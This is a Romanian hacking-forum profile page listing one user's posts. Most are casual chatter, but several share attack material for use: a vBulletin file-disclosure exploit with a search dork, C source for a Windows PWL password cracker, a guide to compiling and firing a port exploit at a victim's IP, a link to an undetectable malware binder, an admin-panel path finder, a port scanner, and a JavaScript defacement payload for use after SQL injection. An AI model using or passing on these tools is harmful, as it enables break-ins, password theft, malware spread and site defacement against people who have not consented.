Jump to content

ANdreicj

Active Members
  • Posts

    245
  • Joined

  • Last visited

Everything posted by ANdreicj

  1. Da, ai dreptate:D
  2. God damn, deja incepeti sa va laudati cu ierburile voastre ! P.S : Trag de mult timp .. si nu ma laud asa ca tine , incetati odata ca, nu cred ca impresionati pe nimeni !
  3. *\-----------------------------------------------------------------------------/* ____ _ _ _ _ (nulled) | _ \ | | | | | (_) __ _| |_) |_ _| | | ___| |_ _ _ __ \ \ / / _ <| | | | | |/ _ \ __| | '_ \ \ V /| |_) | |_| | | | __/ |_| | | | | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| Full disclosure... *\-----------------------------------------------------------------------------/* Name: vBulletin nulled (validator.php) files/directories disclosure Author: TinKode (Am furat de pe RST bugu) Date: 19-01-2010 Dork: "inurl:validator.php" *\-----------------------------------------------------------------------------/* Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin installed... *\-----------------------------------------------------------------------------/* Exploit: http://www.website.com/vB_forum/validator.php *\-----------------------------------------------------------------------------/* Note: Work on many nulled versions (maybe all) *\-----------------------------------------------------------------------------/* Copyrights: http://tinkode.baywords.com *\-----------------------------------------------------------------------------/* Greetz: http://www.insecurity.ro, http://www.darkc0de.com *\-----------------------------------------------------------------------------/*
  4. # include<stdio.h> # include<stdio.h> # include<process.h> # include<stdlib.h> # include<ctype.h> # include<conio.h> # include<mem.h> unsigned char huge Data[100001]; unsigned char keystream[1001]; int Rpoint[300]; void main(int argc,char *argv[]){ FILE *fd; int i,j; int size; char ch; char *name; int cracked; int sizemask; int maxr; int rsz; int pos; int Rall[300]; /* Resourse allocation table */ if(argc<2){ printf("usage: glide filename (username)"); exit(1); } /* Read PWL file */ fd=fopen(argv[1],"rb"); if(fd==NULL){ printf("can't open file %s",argv[1]); exit(1); } size=0; while(!feof(fd)){ Data[size++]=fgetc(fd); } size--; fclose(fd); /* Find Username */ name=argv[1]; if(argc>2)name=argv[2]; printf("Username:%s ",name); /* Copy encrypted text into keystream */ cracked=size-0x0208; if(cracked<0)cracked=0; if(cracked>1000)cracked=1000; memcpy(keystream,Data+0x208,cracked); /* Generate 20 bytes of keystream */ for(i=0;i<20;i++){ ch=toupper(name[i]); if(ch==0)break; if(ch=='.')break; keystream[i]^=ch; }; cracked=20; /* Find allocated resources */ sizemask=keystream[0]+(keystream[1]<<8); printf("Sizemask:%04X ",sizemask); for(i=0;i<256;i++){ if(Data[i]!=0xff){ Rall[Data[i]]++; if(Data[i]>maxr)maxr=Data[i]; } } maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be divisible by 16 */ /*Search after resources */ Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */ for(i=0;i<maxr;i++){ /* Find the size of current resourse */ pos=Rpoint[i]; rsz=Data[pos]+(Data[pos+1]<<8); rsz^=sizemask; printf("Analysing block with size:%04x (%d:%d) ",rsz,i,Rall[i]); if((Rall[i]==0)&&(rsz!=0)){ printf("Unused resourse has nonzero size!!! "); printf("If last line produed any:You may try to recover "); printf("Press y to attempt the recovery "); ch=getch(); if(ch!='y')exit(0); rsz=2; i=i-1; } pos=pos+rsz; /* Resourse have a tedency to have the wrong size for some reason*/ /* Chech for correct size*/ if(i<maxr-1){ while(Data[pos+3]!=keystream[1]){ printf(":",Data[pos+3]); pos=pos+2; /* Very rude may fail */ } } pos+=2; /* Include pointer in size */ Rpoint[i+1]=pos; } Rpoint[maxr]=size; /* Insert Table data into keystream*/ for(i=0;i<=maxr;i++){ keystream[20+2*i]^=Rpoint[i] & 0x00ff; keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff; } cracked+=maxr*2+2; printf("%d Bytes of ketstream recoverd ",cracked); /* Decrypt resources */ for(i=0;i<maxr;i++){ rsz=Rpoint[i+1]-Rpoint[i]; if(rsz>cracked)rsz=cracked; printf("Resource[%d](%d) ",i,rsz); for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]); printf(" "); } exit(0); }
  5. Exploitul este un cod construit în C, VB, etc. faptul c? profit? de un port deschis. Acest ghid v? va înv??a cum s? compila?i un exploit în Cygwin. În urm?toarele etape voi ar?ta cum s? compila?i exploitul folosind un port 5000 exploatat, dar ave?i posibilitatea s? fac? acela?i lucru pentru alte porturi doar descarca exploituri de aici : - Google.com - Securiteam.com - K-otik.com - Astalavista.box.sk - Coromputer.net - Securityfocus.com [ exemplu : "Exploit pentru num?rul de port" ] [+]Pasul 1 : Portului Download 5000 exploatat, de obicei, vine ca exploateaza .txt ?i ave?i nevoie pentru a le schimba in .c [+]Download : http://sources.redhat.com/cygwin/setup.exe [+]Pasul 2 : Deschide?i Cygwin setup.exe ?i instalatil. [+]Pasul 3 : Dup? instalarea programului de care avem nevoie pentru a compila sa exploateze, locul 5000.c exploatat în C: \ cygwin \ bin apoi atunci a alerga în linie de comand? de la - Start - Run - CMD / comanda În fereastra de comand? de tip : CD c:\cygwin\bin gcc 5000.c -o 5000.exe (CD = Open) [+]Pasul 4 : Dupa ce am compilat s? exploateze, folositi-o! =) , în scopul de a conecta computerul victimei care are portul 5000 deschis în acest caz .. Deschide?i linia de comanda de - Start - Run apoi atunci tip : CD c:\cygwin\bin 5000.exe XXX.XXX.XXX.XXX -e XXX.XXX.XXX.XXX - IP-ul victimei [+]Poze : ( pt. a va ajuta la instalare ! ) [+]Download : 5000.c Sursa : InSecurity
  6. Salut , bun venit.
  7. Re-upload, te rog.
  8. ANdreicj

    WarHaze

    Nu am gasit parola de la admin
  9. Pune sursa !
  10. Pune sursa, nu fi tigan !
  11. Baba nebuna ))))))
  12. Felicitari !
  13. ANdreicj

    Detox's blog

    Salut Xenon !
  14. Salutare, asculta de ce ti-a zis Pax, e mai frumoasa copilaria decat PC-ul.
  15. ANdreicj

    hacer

    )))))))) , marele hacer are un root de kkt.
  16. Poate a gasit un scam page, nu a facut )) ..
  17. This tool is like a EXE join, but have special feature.. built-in hijacking method! With this tool you can build malware with cracks, keygens, etc.. The tool make an output EXE FUD crypted and compressed.. Structure “Who to works” Screen Shot : Download : http://rapidshare.com/files/258898836/m4lw4r3_Blinder_v.1.0_Bin.rar
  18. yum install python or apt-get install python ( for linux )
  19. #/usr/bin/python import sys, os, time, httplib if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) != 2: print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Help: admin-find.py -h |" print "|---------------------------------------------------------------|\n" sys.exit(1) for arg in sys.argv: if arg == '-h': print "\n|-----------------------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Usage: admin-find.py www.site.com |" print "| Example: admin-find.py site.com |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) site = sys.argv[1].replace("http://","").rsplit("/",1)[0] site = site.lower() admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administ racion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/ac c ount.php','joomla/administrator','login.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.ht ml','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','adm i n_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html' , 'adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','pa n el-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php', ' admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin / admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moder a tor.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','contro l panel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html' ,'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderato r .htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsea r ch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.h t ml','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.h t ml','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adm i narea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.p h p','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php', ' affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php'] print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "|---------------------------------------------------------------|\n" print "\n[-] %s" % time.strftime("%X") print "[+] Target:",site print "[+] Checking paths..." print try: for admin in admin_path: admin = admin.replace("\n","") admin = "/" + admin connection = httplib.HTTPConnection(site) connection.request("GET",admin) response = connection.getresponse() print "%s %s %s" % (admin, response.status, response.reason) except(KeyboardInterrupt,SystemExit): raise except: pass
  20. Mersi mult
  21. #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int main(int argc, char **argv ){ int sc; int i; char IP[100]; printf("Provide IP for scann : ");[color=violet] /* se cere IP-ul care va fi scanat ( de porturi ) , incercati IP-ul de pe computerul local */ [/color] scanf("%s",&IP); printf(" n Scanning nn"); for(i=0;i<65535;++i) [color=violet]/* o structura repetitiva , de la 0-65000 , se conecteaza pe rand la fiecare dintre aceste porturi , pentru a le verifica starea : deschis / inchis */ [/color] { struct sockaddr_in server; sc = socket(AF_INET, SOCK_STREAM,0); [color=violet]/* se declara socketul client */[/color] server.sin_family = AF_INET; [color=violet]/* familia acestuia , aici AF_INET , pentru comunicarea pe Internet : TCP/IP*/[/color] server.sin_addr.s_addr = inet_addr(IP); [color=violet]/* IP-ul care se doreste a fi scanat , la care se va face conexiunea , pe fiecare port in parte */[/color] server.sin_port = htons(i);[color=violet] /* portul care va fi scanat , repetitiv de la 0-65000 */[/color] if( connect(sc, (struct sockaddr *)&server, sizeof(server)) < 0 ) [color=violet]/* ne conectam la fiecare port in parte , [color=red] connect () , acesta returnand o valoare negativa daca nu e deschis si pozitiva daca este */[/color] { } else{ printf(" : Open " ); [color=violet]/* Daca valoarea nu e negativa , portul e deschis si se afiseaza corespunzator */[/color] printf(" %d : n",i); } } close(sc); [color=violet]/* se inchide socketul client */[/color] return 0;[color=violet] /* se inchide functia main , returnandu-se 0 */[/color] }
  22. Happy new year
  23. Necâ?tig?tor, ?i-e ciud? c? am luat codul de pe "forumul tau" ?i nu am pus sursa ? , îmi pare r?u da mai plagiator e?ti tu cu toate scripturile si toate kkt-urile ( doomclip )
  24. Dedicat celor ce se ocupa cu SQL Injection. Dupa ce ajungeti la admin panel, duceti-va la prima pagina si scrieti : <script>document.body.innerHTML="<body bgcolor='#000000'><center><img src='http://img233.imageshack.us/img233/9433/12921133yq8.jpg' /></center></body>";</script>
  25. Mersi, chiar c?utam demult ..
×
×
  • Create New...